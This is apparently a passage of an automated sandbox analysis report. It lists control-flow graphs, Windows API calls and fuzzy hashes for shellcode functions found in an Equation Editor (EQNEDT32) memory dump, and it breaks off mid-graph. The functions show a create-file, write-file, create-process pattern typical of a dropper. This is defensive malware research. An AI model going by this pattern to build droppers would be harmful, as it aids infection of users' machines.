                                          control_flow_graph 461 3590259-3590261 462 359026f 461->462 463 3590264-359026e 461->463 464 359024b-3590258 462->464 465 3590271-35902f7 call 35902d0 462->465 463->462 469 359034a-359036d 465->469 470 35902fa-35902ff 465->470 473 359036f-3590370 469->473 474 35903d4-35903e4 call 35903e8 469->474 475 3590302-359031c 470->475 476 3590367-359036d call 3590378 470->476 478 3590372-3590388 473->478 479 35903d7-35903e4 473->479 483 35903eb-3590420 call 359040f 474->483 484 359038d-359039a CreateFileW call 35903af 475->484 492 359031e-3590324 475->492 476->473 476->474 478->484 479->483 493 3590422-3590424 483->493 494 3590487 483->494 491 359039f-35903ad 484->491 497 3590398 492->497 498 3590326-3590349 call 3590365 492->498 499 359049c-359049d 493->499 500 3590427 493->500 502 3590489-3590495 call 35904a8 494->502 503 35904ad-35904bb call 35904c4 494->503 497->491 504 359039a call 35903af 497->504 498->469 506 359049e-35904a0 499->506 507 3590504-3590505 499->507 505 359042a-3590470 call 359044e 500->505 500->506 521 359050b 502->521 529 3590497 502->529 527 35904bd 503->527 528 3590526-359054d WriteFile 503->528 504->491 530 35904e8 505->530 531 3590473 505->531 512 35904a3-35904a5 506->512 513 3590507 507->513 519 359050c-3590518 512->519 520 35904a7-35904ab 512->520 513->521 532 359051a-359051f 519->532 533 359054f-3590561 call 3590563 519->533 520->503 521->519 534 35904bf-35904c8 527->534 535 3590524 527->535 528->513 536 3590499 529->536 537 35904eb-35904ff call 3590502 529->537 538 35904ea 530->538 531->538 539 3590476-359049d call 35904a8 531->539 532->528 540 3590521 532->540 553 3590565-3590574 call 3590580 533->553 535->528 536->499 550 3590501 537->550 551 3590562 537->551 538->537 539->507 555 359049f-35904a0 539->555 540->528 550->507 551->553 560 35905d7-35905db 553->560 561 3590576 553->561 555->512 562 35905dd-35905e2 ExitProcess 560->562 563 3590578 561->563 564 35905ec-35905ef 561->564 566 35905ea 563->566 567 359057a-3590593 call 35905a1 563->567 565 35905f2-35905f4 564->565 569 35905f7-3590603 call 359060c 565->569 566->564 576 35905fa-35905fc call 359060c 567->576 577 3590595-3590596 567->577 569->565 574 3590605-3590609 569->574 580 35905fd-3590603 576->580 579 3590598-3590599 577->579 577->580 581 359059b-359059e 579->581 582 359060a 579->582 580->565 580->574 581->569 583 35905a0-35905d4 CreateProcessW call 35905dd 581->583 587 3590626 583->587 588 35905d6 583->588 591 3590628-359062c 587->591 592 359062e-3590632 587->592 589 35905d8-35905db 588->589 590 3590647-3590649 588->590 589->562 595 3590659-359065a 590->595 591->592 593 359063a-3590641 591->593 592->590 594 3590634-3590638 592->594 596 3590643 593->596 597 3590645 593->597 594->590 594->593 596->590 598 359064b-3590654 597->598 600 359061d-3590620 598->600 601 3590656 598->601 600->598 602 3590622 600->602 601->595 602->587
                                          APIs
                                          • CreateFileW.KERNELBASE(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 03590395
                                            • Part of subcall function 035903AF: LoadLibraryW.KERNEL32(0359039F), ref: 035903AF
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateFileLibraryLoad
                                          • String ID:
                                          • API String ID: 2049390123-0
                                          • Opcode ID: 08466a33bc151eb96c27a536a204423fdb2a401b39198ad3b6eb24cd9949cb52
                                          • Instruction ID: ef1eb81cd9c44ee9852d60c1dcad67df0a5e5ad3d23e0f0e0b5ef8022f4334ef
                                          • Opcode Fuzzy Hash: 08466a33bc151eb96c27a536a204423fdb2a401b39198ad3b6eb24cd9949cb52
                                          • Instruction Fuzzy Hash: 4641126140D7C15FEB12CB346D6A694BF64BF5B600B1C8ACBC1C44F1F3D265A14AD362
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 035900AB Relevance: 1.6, APIs: 1, Instructions: 129COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 603 35900ab-35900ac 604 35900b8 603->604 605 35900ec-35900f2 603->605 606 35900bc-35900bf 604->606 607 3590090-3590118 604->607 605->604 608 35900fb-3590143 605->608 606->608 619 35900c1-359010c 607->619 618 3590149-35902b3 608->618 608->619 624 35902be-35902f7 618->624 625 35902b9 call 35902d0 618->625 619->606 627 359034a-359036d 624->627 628 35902fa-35902ff 624->628 625->624 633 359036f-3590370 627->633 634 35903d4-35903e4 call 35903e8 627->634 635 3590302-359031c 628->635 636 3590367-359036d call 3590378 628->636 638 3590372-3590388 633->638 639 35903d7-35903e4 633->639 644 35903eb-3590420 call 359040f 634->644 645 359038d-359039a CreateFileW call 35903af 635->645 653 359031e-3590324 635->653 636->633 636->634 638->645 639->644 654 3590422-3590424 644->654 655 3590487 644->655 652 359039f-35903ad 645->652 658 3590398 653->658 659 3590326-3590349 call 3590365 653->659 660 359049c-359049d 654->660 661 3590427 654->661 663 3590489-3590495 call 35904a8 655->663 664 35904ad-35904bb call 35904c4 655->664 658->652 665 359039a call 35903af 658->665 659->627 667 359049e-35904a0 660->667 668 3590504-3590505 660->668 666 359042a-3590470 call 359044e 661->666 661->667 682 359050b 663->682 690 3590497 663->690 688 35904bd 664->688 689 3590526-359054d WriteFile 664->689 665->652 691 35904e8 666->691 692 3590473 666->692 673 35904a3-35904a5 667->673 674 3590507 668->674 680 359050c-3590518 673->680 681 35904a7-35904ab 673->681 674->682 693 359051a-359051f 680->693 694 359054f-3590561 call 3590563 680->694 681->664 682->680 695 35904bf-35904c8 688->695 696 3590524 688->696 689->674 697 3590499 690->697 698 35904eb-35904ff call 3590502 690->698 699 35904ea 691->699 692->699 700 3590476-359049d call 35904a8 692->700 693->689 701 3590521 693->701 714 3590565-3590574 call 3590580 694->714 696->689 697->660 711 3590501 698->711 712 3590562 698->712 699->698 700->668 716 359049f-35904a0 700->716 701->689 711->668 712->714 721 35905d7-35905db 714->721 722 3590576 714->722 716->673 723 35905dd-35905e2 ExitProcess 721->723 724 3590578 722->724 725 35905ec-35905ef 722->725 727 35905ea 724->727 728 359057a-3590593 call 35905a1 724->728 726 35905f2-35905f4 725->726 730 35905f7-3590603 call 359060c 726->730 727->725 737 35905fa-35905fc call 359060c 728->737 738 3590595-3590596 728->738 730->726 735 3590605-3590609 730->735 741 35905fd-3590603 737->741 740 3590598-3590599 738->740 738->741 742 359059b-359059e 740->742 743 359060a 740->743 741->726 741->735 742->730 744 35905a0-35905d4 CreateProcessW call 35905dd 742->744 748 3590626 744->748 749 35905d6 744->749 752 3590628-359062c 748->752 753 359062e-3590632 748->753 750 35905d8-35905db 749->750 751 3590647-3590649 749->751 750->723 756 3590659-359065a 751->756 752->753 754 359063a-3590641 752->754 753->751 755 3590634-3590638 753->755 757 3590643 754->757 758 3590645 754->758 755->751 755->754 757->751 759 359064b-3590654 758->759 761 359061d-3590620 759->761 762 3590656 759->762 761->759 763 3590622 761->763 762->756 763->748
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: 6d6de990fe797286e064a2f262e62d974b589ff7f4d75b2c019d389a6ebc00bc
                                          • Instruction ID: 53ed08e6f5f21d0066e3ae65cb43b4db9947ab33ed8c5e516541e2156424e4ef
                                          • Opcode Fuzzy Hash: 6d6de990fe797286e064a2f262e62d974b589ff7f4d75b2c019d389a6ebc00bc
                                          • Instruction Fuzzy Hash: C041CC6140C3C08FFF11D6207E9A665BFA4BB07600F4E8EDB85824F0F3D294924AA353
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 035900EB Relevance: 1.6, APIs: 1, Instructions: 128COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 764 35900eb-35900f2 765 35900b8 764->765 766 35900fb-3590143 764->766 767 35900bc-35900bf 765->767 768 3590090-3590118 765->768 777 3590149-35902b3 766->777 778 35900c1-359010c 766->778 767->766 768->778 784 35902be-35902f7 777->784 785 35902b9 call 35902d0 777->785 778->767 787 359034a-359036d 784->787 788 35902fa-35902ff 784->788 785->784 793 359036f-3590370 787->793 794 35903d4-35903e4 call 35903e8 787->794 795 3590302-359031c 788->795 796 3590367-359036d call 3590378 788->796 798 3590372-3590388 793->798 799 35903d7-35903e4 793->799 804 35903eb-3590420 call 359040f 794->804 805 359038d-359039a CreateFileW call 35903af 795->805 813 359031e-3590324 795->813 796->793 796->794 798->805 799->804 814 3590422-3590424 804->814 815 3590487 804->815 812 359039f-35903ad 805->812 818 3590398 813->818 819 3590326-3590349 call 3590365 813->819 820 359049c-359049d 814->820 821 3590427 814->821 823 3590489-3590495 call 35904a8 815->823 824 35904ad-35904bb call 35904c4 815->824 818->812 825 359039a call 35903af 818->825 819->787 827 359049e-35904a0 820->827 828 3590504-3590505 820->828 826 359042a-3590470 call 359044e 821->826 821->827 842 359050b 823->842 850 3590497 823->850 848 35904bd 824->848 849 3590526-359054d WriteFile 824->849 825->812 851 35904e8 826->851 852 3590473 826->852 833 35904a3-35904a5 827->833 834 3590507 828->834 840 359050c-3590518 833->840 841 35904a7-35904ab 833->841 834->842 853 359051a-359051f 840->853 854 359054f-3590561 call 3590563 840->854 841->824 842->840 855 35904bf-35904c8 848->855 856 3590524 848->856 849->834 857 3590499 850->857 858 35904eb-35904ff call 3590502 850->858 859 35904ea 851->859 852->859 860 3590476-359049d call 35904a8 852->860 853->849 861 3590521 853->861 874 3590565-3590574 call 3590580 854->874 856->849 857->820 871 3590501 858->871 872 3590562 858->872 859->858 860->828 876 359049f-35904a0 860->876 861->849 871->828 872->874 881 35905d7-35905db 874->881 882 3590576 874->882 876->833 883 35905dd-35905e2 ExitProcess 881->883 884 3590578 882->884 885 35905ec-35905ef 882->885 887 35905ea 884->887 888 359057a-3590593 call 35905a1 884->888 886 35905f2-35905f4 885->886 890 35905f7-3590603 call 359060c 886->890 887->885 897 35905fa-35905fc call 359060c 888->897 898 3590595-3590596 888->898 890->886 895 3590605-3590609 890->895 901 35905fd-3590603 897->901 900 3590598-3590599 898->900 898->901 902 359059b-359059e 900->902 903 359060a 900->903 901->886 901->895 902->890 904 35905a0-35905d4 CreateProcessW call 35905dd 902->904 908 3590626 904->908 909 35905d6 904->909 912 3590628-359062c 908->912 913 359062e-3590632 908->913 910 35905d8-35905db 909->910 911 3590647-3590649 909->911 910->883 916 3590659-359065a 911->916 912->913 914 359063a-3590641 912->914 913->911 915 3590634-3590638 913->915 917 3590643 914->917 918 3590645 914->918 915->911 915->914 917->911 919 359064b-3590654 918->919 921 359061d-3590620 919->921 922 3590656 919->922 921->919 923 3590622 921->923 922->916 923->908
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: f9eefd21bbc794892dd33f7cc53fed70693d3882f9914b97490317e015f93b55
                                          • Instruction ID: 1c84b6f3fe24e5d33b0d04ad9ed7a22ea466d577fef8ab85edc9f52ba9bcd751
                                          • Opcode Fuzzy Hash: f9eefd21bbc794892dd33f7cc53fed70693d3882f9914b97490317e015f93b55
                                          • Instruction Fuzzy Hash: 7B41CD6580D3C08FFF12D6607E9A665BF64BB07600F5E8EDB85824F0F3D294924AA353
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03590365 Relevance: 1.6, APIs: 1, Instructions: 126COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1243 3590365-359036d call 3590378 1247 359036f-3590370 1243->1247 1248 35903d4-35903e4 call 35903e8 1243->1248 1249 3590372-35903ad CreateFileW call 35903af 1247->1249 1250 35903d7-35903e4 1247->1250 1252 35903eb-3590420 call 359040f 1248->1252 1250->1252 1259 3590422-3590424 1252->1259 1260 3590487 1252->1260 1262 359049c-359049d 1259->1262 1263 3590427 1259->1263 1265 3590489-3590495 call 35904a8 1260->1265 1266 35904ad-35904bb call 35904c4 1260->1266 1268 359049e-35904a0 1262->1268 1269 3590504-3590505 1262->1269 1267 359042a-3590470 call 359044e 1263->1267 1263->1268 1281 359050b 1265->1281 1288 3590497 1265->1288 1286 35904bd 1266->1286 1287 3590526-359054d WriteFile 1266->1287 1289 35904e8 1267->1289 1290 3590473 1267->1290 1273 35904a3-35904a5 1268->1273 1274 3590507 1269->1274 1279 359050c-3590518 1273->1279 1280 35904a7-35904ab 1273->1280 1274->1281 1291 359051a-359051f 1279->1291 1292 359054f-3590561 call 3590563 1279->1292 1280->1266 1281->1279 1293 35904bf-35904c8 1286->1293 1294 3590524 1286->1294 1287->1274 1295 3590499 1288->1295 1296 35904eb-35904ff call 3590502 1288->1296 1297 35904ea 1289->1297 1290->1297 1298 3590476-359049d call 35904a8 1290->1298 1291->1287 1299 3590521 1291->1299 1312 3590565-3590574 call 3590580 1292->1312 1294->1287 1295->1262 1309 3590501 1296->1309 1310 3590562 1296->1310 1297->1296 1298->1269 1314 359049f-35904a0 1298->1314 1299->1287 1309->1269 1310->1312 1319 35905d7-35905db 1312->1319 1320 3590576 1312->1320 1314->1273 1321 35905dd-35905e2 ExitProcess 1319->1321 1322 3590578 1320->1322 1323 35905ec-35905ef 1320->1323 1325 35905ea 1322->1325 1326 359057a-3590593 call 35905a1 1322->1326 1324 35905f2-35905f4 1323->1324 1328 35905f7-3590603 call 359060c 1324->1328 1325->1323 1335 35905fa-35905fc call 359060c 1326->1335 1336 3590595-3590596 1326->1336 1328->1324 1333 3590605-3590609 1328->1333 1339 35905fd-3590603 1335->1339 1338 3590598-3590599 1336->1338 1336->1339 1340 359059b-359059e 1338->1340 1341 359060a 1338->1341 1339->1324 1339->1333 1340->1328 1342 35905a0-35905d4 CreateProcessW call 35905dd 1340->1342 1346 3590626 1342->1346 1347 35905d6 1342->1347 1350 3590628-359062c 1346->1350 1351 359062e-3590632 1346->1351 1348 35905d8-35905db 1347->1348 1349 3590647-3590649 1347->1349 1348->1321 1354 3590659-359065a 1349->1354 1350->1351 1352 359063a-3590641 1350->1352 1351->1349 1353 3590634-3590638 1351->1353 1355 3590643 1352->1355 1356 3590645 1352->1356 1353->1349 1353->1352 1355->1349 1357 359064b-3590654 1356->1357 1359 359061d-3590620 1357->1359 1360 3590656 1357->1360 1359->1357 1361 3590622 1359->1361 1360->1354 1361->1346
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 5aa79df4ebd134425b0418eafa11f0fbb2d9ba4dc7a1d245d1fbef9500bf2495
                                          • Instruction ID: 6d7866130785b13b1bad01a52c9699810a23bbdd0ab81435140c00c9910668e6
                                          • Opcode Fuzzy Hash: 5aa79df4ebd134425b0418eafa11f0fbb2d9ba4dc7a1d245d1fbef9500bf2495
                                          • Instruction Fuzzy Hash: B141BD2044D3C16FEB22E7249D5AB69BF747F83600F2889CFE1854F0F3E66566059316
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0359040F Relevance: 1.6, APIs: 1, Instructions: 126COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1362 359040f-3590420 call 359042b 1366 3590422-3590424 1362->1366 1367 3590487 1362->1367 1368 359049c-359049d 1366->1368 1369 3590427 1366->1369 1370 3590489-359048c call 35904a8 1367->1370 1371 35904ad-35904bb call 35904c4 1367->1371 1373 359049e-35904a0 1368->1373 1374 3590504-3590505 1368->1374 1372 359042a-3590470 call 359044e 1369->1372 1369->1373 1387 359048d-3590495 1370->1387 1390 35904bd 1371->1390 1391 3590526-359054d WriteFile 1371->1391 1393 35904e8 1372->1393 1394 3590473 1372->1394 1377 35904a3-35904a5 1373->1377 1378 3590507 1374->1378 1383 359050c 1377->1383 1384 35904a7-35904ab 1377->1384 1385 359050b 1378->1385 1389 3590512-3590518 1383->1389 1384->1371 1385->1383 1387->1385 1392 3590497 1387->1392 1395 359051a-359051f 1389->1395 1396 359054f-3590561 call 3590563 1389->1396 1397 35904bf-35904c8 1390->1397 1398 3590524 1390->1398 1391->1378 1399 3590499 1392->1399 1400 35904eb-35904ff call 3590502 1392->1400 1401 35904ea 1393->1401 1394->1401 1402 3590476-3590486 1394->1402 1395->1391 1403 3590521 1395->1403 1416 3590565-3590574 call 3590580 1396->1416 1398->1391 1399->1368 1413 3590501 1400->1413 1414 3590562 1400->1414 1401->1400 1408 359048c-359049d call 35904a8 1402->1408 1403->1391 1408->1374 1418 359049f-35904a0 1408->1418 1413->1374 1414->1416 1423 35905d7-35905db 1416->1423 1424 3590576 1416->1424 1418->1377 1425 35905dd-35905e2 ExitProcess 1423->1425 1426 3590578 1424->1426 1427 35905ec-35905ef 1424->1427 1429 35905ea 1426->1429 1430 359057a-3590593 call 35905a1 1426->1430 1428 35905f2-35905f4 1427->1428 1432 35905f7-3590603 call 359060c 1428->1432 1429->1427 1439 35905fa-35905fc call 359060c 1430->1439 1440 3590595-3590596 1430->1440 1432->1428 1437 3590605-3590609 1432->1437 1443 35905fd-3590603 1439->1443 1442 3590598-3590599 1440->1442 1440->1443 1444 359059b-359059e 1442->1444 1445 359060a 1442->1445 1443->1428 1443->1437 1444->1432 1446 35905a0-35905cc CreateProcessW call 35905dd 1444->1446 1448 35905d1-35905d4 1446->1448 1450 3590626 1448->1450 1451 35905d6 1448->1451 1454 3590628-359062c 1450->1454 1455 359062e-3590632 1450->1455 1452 35905d8-35905db 1451->1452 1453 3590647-3590649 1451->1453 1452->1425 1458 3590659-359065a 1453->1458 1454->1455 1456 359063a-3590641 1454->1456 1455->1453 1457 3590634-3590638 1455->1457 1459 3590643 1456->1459 1460 3590645 1456->1460 1457->1453 1457->1456 1459->1453 1461 359064b-3590654 1460->1461 1463 359061d-3590620 1461->1463 1464 3590656 1461->1464 1463->1461 1465 3590622 1463->1465 1464->1458 1465->1450
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 79d030c691eb325257c525efe830e11a8053abe78c6dd291c469d14947359298
                                          • Instruction ID: eedfb0e384fa8637a9b082288643451426452245d52ec022297043aa513ab469
                                          • Opcode Fuzzy Hash: 79d030c691eb325257c525efe830e11a8053abe78c6dd291c469d14947359298
                                          • Instruction Fuzzy Hash: 5831B76040C3C2AFEF11DB649D45B6ABF79BFC2600F188D8FF0854B0F2E66596188766
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03590136 Relevance: 1.6, APIs: 1, Instructions: 126COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1084 3590136-3590137 1085 3590141-3590143 1084->1085 1086 3590090-3590118 1084->1086 1087 3590149-35902b3 1085->1087 1088 35900c1-359012e 1085->1088 1086->1088 1095 35902be-35902f7 1087->1095 1096 35902b9 call 35902d0 1087->1096 1088->1085 1098 359034a-359036d 1095->1098 1099 35902fa-35902ff 1095->1099 1096->1095 1107 359036f-3590370 1098->1107 1108 35903d4-35903e4 call 35903e8 1098->1108 1109 3590302-359031c 1099->1109 1110 3590367-359036d call 3590378 1099->1110 1112 3590372-3590388 1107->1112 1113 35903d7-35903e4 1107->1113 1118 35903eb-3590420 call 359040f 1108->1118 1119 359038d-359039a CreateFileW call 35903af 1109->1119 1130 359031e-3590324 1109->1130 1110->1107 1110->1108 1112->1119 1113->1118 1131 3590422-3590424 1118->1131 1132 3590487 1118->1132 1129 359039f-35903ad 1119->1129 1136 3590398 1130->1136 1137 3590326-3590349 call 3590365 1130->1137 1138 359049c-359049d 1131->1138 1139 3590427 1131->1139 1142 3590489-3590495 call 35904a8 1132->1142 1143 35904ad-35904bb call 35904c4 1132->1143 1136->1129 1144 359039a call 35903af 1136->1144 1137->1098 1146 359049e-35904a0 1138->1146 1147 3590504-3590505 1138->1147 1145 359042a-3590470 call 359044e 1139->1145 1139->1146 1161 359050b 1142->1161 1169 3590497 1142->1169 1167 35904bd 1143->1167 1168 3590526-359054d WriteFile 1143->1168 1144->1129 1170 35904e8 1145->1170 1171 3590473 1145->1171 1152 35904a3-35904a5 1146->1152 1153 3590507 1147->1153 1159 359050c-3590518 1152->1159 1160 35904a7-35904ab 1152->1160 1153->1161 1172 359051a-359051f 1159->1172 1173 359054f-3590561 call 3590563 1159->1173 1160->1143 1161->1159 1174 35904bf-35904c8 1167->1174 1175 3590524 1167->1175 1168->1153 1176 3590499 1169->1176 1177 35904eb-35904ff call 3590502 1169->1177 1178 35904ea 1170->1178 1171->1178 1179 3590476-359049d call 35904a8 1171->1179 1172->1168 1180 3590521 1172->1180 1193 3590565-3590574 call 3590580 1173->1193 1175->1168 1176->1138 1190 3590501 1177->1190 1191 3590562 1177->1191 1178->1177 1179->1147 1195 359049f-35904a0 1179->1195 1180->1168 1190->1147 1191->1193 1200 35905d7-35905db 1193->1200 1201 3590576 1193->1201 1195->1152 1202 35905dd-35905e2 ExitProcess 1200->1202 1203 3590578 1201->1203 1204 35905ec-35905ef 1201->1204 1206 35905ea 1203->1206 1207 359057a-3590593 call 35905a1 1203->1207 1205 35905f2-35905f4 1204->1205 1209 35905f7-3590603 call 359060c 1205->1209 1206->1204 1216 35905fa-35905fc call 359060c 1207->1216 1217 3590595-3590596 1207->1217 1209->1205 1214 3590605-3590609 1209->1214 1220 35905fd-3590603 1216->1220 1219 3590598-3590599 1217->1219 1217->1220 1221 359059b-359059e 1219->1221 1222 359060a 1219->1222 1220->1205 1220->1214 1221->1209 1223 35905a0-35905d4 CreateProcessW call 35905dd 1221->1223 1227 3590626 1223->1227 1228 35905d6 1223->1228 1231 3590628-359062c 1227->1231 1232 359062e-3590632 1227->1232 1229 35905d8-35905db 1228->1229 1230 3590647-3590649 1228->1230 1229->1202 1235 3590659-359065a 1230->1235 1231->1232 1233 359063a-3590641 1231->1233 1232->1230 1234 3590634-3590638 1232->1234 1236 3590643 1233->1236 1237 3590645 1233->1237 1234->1230 1234->1233 1236->1230 1238 359064b-3590654 1237->1238 1240 359061d-3590620 1238->1240 1241 3590656 1238->1241 1240->1238 1242 3590622 1240->1242 1241->1235 1242->1227
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: 2333f2cf7e3f74b253a55daf2f7288a82eead362f6b8a443f8e6401fdf3756e6
                                          • Instruction ID: 1ec8dddffbc93c831abbb176eb9385f3b9b8736b04afa0108b1e5af2e6c189a3
                                          • Opcode Fuzzy Hash: 2333f2cf7e3f74b253a55daf2f7288a82eead362f6b8a443f8e6401fdf3756e6
                                          • Instruction Fuzzy Hash: C541AC6540D3C08FFF11D6607E9A665BF64BB07600F5E8DDB85824F0F3D294924AA353
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 035900AE Relevance: 1.6, APIs: 1, Instructions: 126COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 924 35900ae-35900b8 926 35900bc-3590143 924->926 927 3590090-3590118 924->927 939 3590149-35902b3 926->939 940 35900c1-359010c 926->940 927->940 944 35902be-35902f7 939->944 945 35902b9 call 35902d0 939->945 940->926 947 359034a-359036d 944->947 948 35902fa-35902ff 944->948 945->944 953 359036f-3590370 947->953 954 35903d4-35903e4 call 35903e8 947->954 955 3590302-359031c 948->955 956 3590367-359036d call 3590378 948->956 958 3590372-3590388 953->958 959 35903d7-35903e4 953->959 964 35903eb-3590420 call 359040f 954->964 965 359038d-359039a CreateFileW call 35903af 955->965 973 359031e-3590324 955->973 956->953 956->954 958->965 959->964 974 3590422-3590424 964->974 975 3590487 964->975 972 359039f-35903ad 965->972 978 3590398 973->978 979 3590326-3590349 call 3590365 973->979 980 359049c-359049d 974->980 981 3590427 974->981 983 3590489-3590495 call 35904a8 975->983 984 35904ad-35904bb call 35904c4 975->984 978->972 985 359039a call 35903af 978->985 979->947 987 359049e-35904a0 980->987 988 3590504-3590505 980->988 986 359042a-3590470 call 359044e 981->986 981->987 1002 359050b 983->1002 1010 3590497 983->1010 1008 35904bd 984->1008 1009 3590526-359054d WriteFile 984->1009 985->972 1011 35904e8 986->1011 1012 3590473 986->1012 993 35904a3-35904a5 987->993 994 3590507 988->994 1000 359050c-3590518 993->1000 1001 35904a7-35904ab 993->1001 994->1002 1013 359051a-359051f 1000->1013 1014 359054f-3590561 call 3590563 1000->1014 1001->984 1002->1000 1015 35904bf-35904c8 1008->1015 1016 3590524 1008->1016 1009->994 1017 3590499 1010->1017 1018 35904eb-35904ff call 3590502 1010->1018 1019 35904ea 1011->1019 1012->1019 1020 3590476-359049d call 35904a8 1012->1020 1013->1009 1021 3590521 1013->1021 1034 3590565-3590574 call 3590580 1014->1034 1016->1009 1017->980 1031 3590501 1018->1031 1032 3590562 1018->1032 1019->1018 1020->988 1036 359049f-35904a0 1020->1036 1021->1009 1031->988 1032->1034 1041 35905d7-35905db 1034->1041 1042 3590576 1034->1042 1036->993 1043 35905dd-35905e2 ExitProcess 1041->1043 1044 3590578 1042->1044 1045 35905ec-35905ef 1042->1045 1047 35905ea 1044->1047 1048 359057a-3590593 call 35905a1 1044->1048 1046 35905f2-35905f4 1045->1046 1050 35905f7-3590603 call 359060c 1046->1050 1047->1045 1057 35905fa-35905fc call 359060c 1048->1057 1058 3590595-3590596 1048->1058 1050->1046 1055 3590605-3590609 1050->1055 1061 35905fd-3590603 1057->1061 1060 3590598-3590599 1058->1060 1058->1061 1062 359059b-359059e 1060->1062 1063 359060a 1060->1063 1061->1046 1061->1055 1062->1050 1064 35905a0-35905d4 CreateProcessW call 35905dd 1062->1064 1068 3590626 1064->1068 1069 35905d6 1064->1069 1072 3590628-359062c 1068->1072 1073 359062e-3590632 1068->1073 1070 35905d8-35905db 1069->1070 1071 3590647-3590649 1069->1071 1070->1043 1076 3590659-359065a 1071->1076 1072->1073 1074 359063a-3590641 1072->1074 1073->1071 1075 3590634-3590638 1073->1075 1077 3590643 1074->1077 1078 3590645 1074->1078 1075->1071 1075->1074 1077->1071 1079 359064b-3590654 1078->1079 1081 359061d-3590620 1079->1081 1082 3590656 1079->1082 1081->1079 1083 3590622 1081->1083 1082->1076 1083->1068
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: 7921c0718d071efa976133d24f1f59b1b54f69aa326bd927ce4ffa730d741742
                                          • Instruction ID: 94baacee84cc4ac44abad4b370b5c075a6b25cbb003d8863d5f6c918d884ee8d
                                          • Opcode Fuzzy Hash: 7921c0718d071efa976133d24f1f59b1b54f69aa326bd927ce4ffa730d741742
                                          • Instruction Fuzzy Hash: 3B41BD6540D3C08FFF11D6607E9A665BF64BB07600F4E8EDB85824F0F3D294924AA353
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0359007B Relevance: 1.6, APIs: 1, Instructions: 125COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1466 359007b-359007c 1467 3590087-3590143 1466->1467 1468 3590096-3590118 1466->1468 1479 35900c1-359010c 1467->1479 1486 3590149-35902b3 1467->1486 1468->1479 1479->1467 1488 35902be-35902f7 1486->1488 1489 35902b9 call 35902d0 1486->1489 1490 359034a-359036d 1488->1490 1491 35902fa-35902ff 1488->1491 1489->1488 1494 359036f-3590370 1490->1494 1495 35903d4-35903e4 call 35903e8 1490->1495 1496 3590302-359031c 1491->1496 1497 3590367-359036d call 3590378 1491->1497 1499 3590372-3590388 1494->1499 1500 35903d7-35903e4 1494->1500 1504 35903eb-3590420 call 359040f 1495->1504 1505 359038d-359039a CreateFileW call 35903af 1496->1505 1513 359031e-3590324 1496->1513 1497->1494 1497->1495 1499->1505 1500->1504 1514 3590422-3590424 1504->1514 1515 3590487 1504->1515 1512 359039f-35903ad 1505->1512 1518 3590398 1513->1518 1519 3590326-3590349 call 3590365 1513->1519 1520 359049c-359049d 1514->1520 1521 3590427 1514->1521 1523 3590489-3590495 call 35904a8 1515->1523 1524 35904ad-35904bb call 35904c4 1515->1524 1518->1512 1525 359039a 